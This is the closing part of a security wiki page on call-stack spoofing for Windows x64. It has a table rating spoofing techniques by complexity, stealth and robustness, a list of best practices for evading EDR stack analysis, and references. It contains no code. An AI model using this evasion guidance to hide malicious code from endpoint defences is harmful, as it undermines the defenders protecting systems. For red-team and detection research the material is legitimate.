┌────────────────────────────────┬────────────┬────────────┬─────────────┐
│ Technique                      │ Complexity │ Stealth    │ Robustness  │
├────────────────────────────────┼────────────┼────────────┼─────────────┤
│ Simple return addr replacement │ Low        │ Low        │ Low         │
│ RET gadget chains              │ Medium     │ Medium     │ Medium      │
│ Full synthetic frames          │ High       │ High       │ High        │
│ Realistic call chains          │ Very High  │ Very High  │ High        │
│ + Randomization               │ Very High  │ Very High  │ Very High   │
└────────────────────────────────┴────────────┴────────────┴─────────────┘

Best Practices:

Use gadgets from multiple trusted system modules
Build frames matching expected API call patterns
Randomize frame count and gadget selection per call
Maintain valid RBP chains through synthetic frames
Test against target EDR's specific stack analysis
Consider RUNTIME_FUNCTION implications for advanced EDRs

References

Windows x64 Calling Convention (Microsoft Documentation)
PE Format: Exception Directory and RUNTIME_FUNCTION
"Windows Internals" by Russinovich, Solomon, Ionescu
Research: "Bypassing User-Mode Hooks and Direct Syscall Detection"
MITRE ATT&CK: T1055 (Process Injection techniques)

← Back to Wiki